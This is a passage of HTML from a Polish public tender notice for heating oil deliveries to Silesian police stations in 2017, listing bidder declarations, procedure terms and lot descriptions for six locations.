              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Formularz ofertowy wypełniony zgodnie z załącznikiem nr 1 do SIWZ. 
2. Oświadczenia wymagane na podstawie art. 25a ust. 1 ustawy Pzp, złożone na formularzu stanowiącym załącznik nr 5. do SIWZ oraz aktualne na dzień składania ofert: UWAGA: a) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków 
	udziału w postępowaniu zobowiązany jest zamieścić informacje o  tych podmiotach we wskazanym wyżej oświadczeniu.
	b) Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu
	wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu zobowiązany jest
	do zamieszczenia informacji o podwykonawcach we wskazanym wyżej oświadczeniu.
	c) W przypadku wspólnego ubiegania się o zamówienie wskazane wyżej oświadczenie składa każdy z    	wykonawców wspólnie ubiegających się o zamówienie.
3. Oświadczenie, że oferowany olej opałowy, grzewczy posiada parametry wskazane w załączniku nr 9 do SIWZ (złożone na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ).
4. Oświadczenie, że Wykonawca dostarczy olej opałowy, grzewczy w ciągu 48 godzin w dni robocze w godzinach pracy od 8:00 do 14:30 a w szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego będą miały miejsce w dni wolne od pracy,  na telefoniczne zgłoszenie Zamawiającego,  które zostanie niezwłocznie potwierdzone w formie pisemnej  złożone na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ na odrębnym dokumencie. 
5. Oświadczenie, że Wykonawca zdobył konieczne informacje niezbędne do właściwego przygotowania oferty, złożone na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ lub na odrębnym dokumencie.
6. Oświadczenie, że Wykonawca uważa się związany ofertą na czas wskazany w rozdz. VII SIWZ, złożone na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ lub na odrębnym dokumencie.
7. Oświadczenie, że Wykonawca nie zastosował ceny dumpingowej i oferta nie stanowi czynu nieuczciwej konkurencji zgodnie z art. 89 ust. 1 pkt 3 ustawy Pzp oraz 5-17 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, złożone na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ lub na odrębnym dokumencie.
8. Oświadczenie Wykonawcy czy powierza podwykonawcy/com wykonanie zamówienia. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Wykonawca wskaże części, jakie będzie realizował  przy jego/ich udziale wraz z podaniem firm podwykonawców, którzy będą realizować ten zakres, złożone na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ lub na odrębnym dokumencie. 
9. Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i treścią projektu umowy i przyjmuje je
bez zastrzeżeń złożone na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ lub na odrębnym dokumencie.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Postanowienia dotyczące realizacji zamówienia są zawarte w załączniku nr 2 do SIWZ  projekt umowy.
2. Zamawiający dopuszcza możliwość zmian postanowień umowy w zakresie: ustawowej zmiany stawki podatku VAT
w czasie realizacji zamówienia, o wielkość tej stawki.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KMP Bielsko-Biała, IV KP, ul. Komorowicka 235<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).
8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KMP Chorzów, I KP, ul. S. Batorego 19<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców.8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KMP Chorzów, II KP, ul. Moniuszki 11<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).
8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KPP Kłobuck, KP Krzepice, ul. Mickiewicza 34<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców. 8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KMP Mysłowice, ul. Starokościelna 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców.8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KMP Sosnowiec, II KP, ul. Żeromskiego 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).
8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
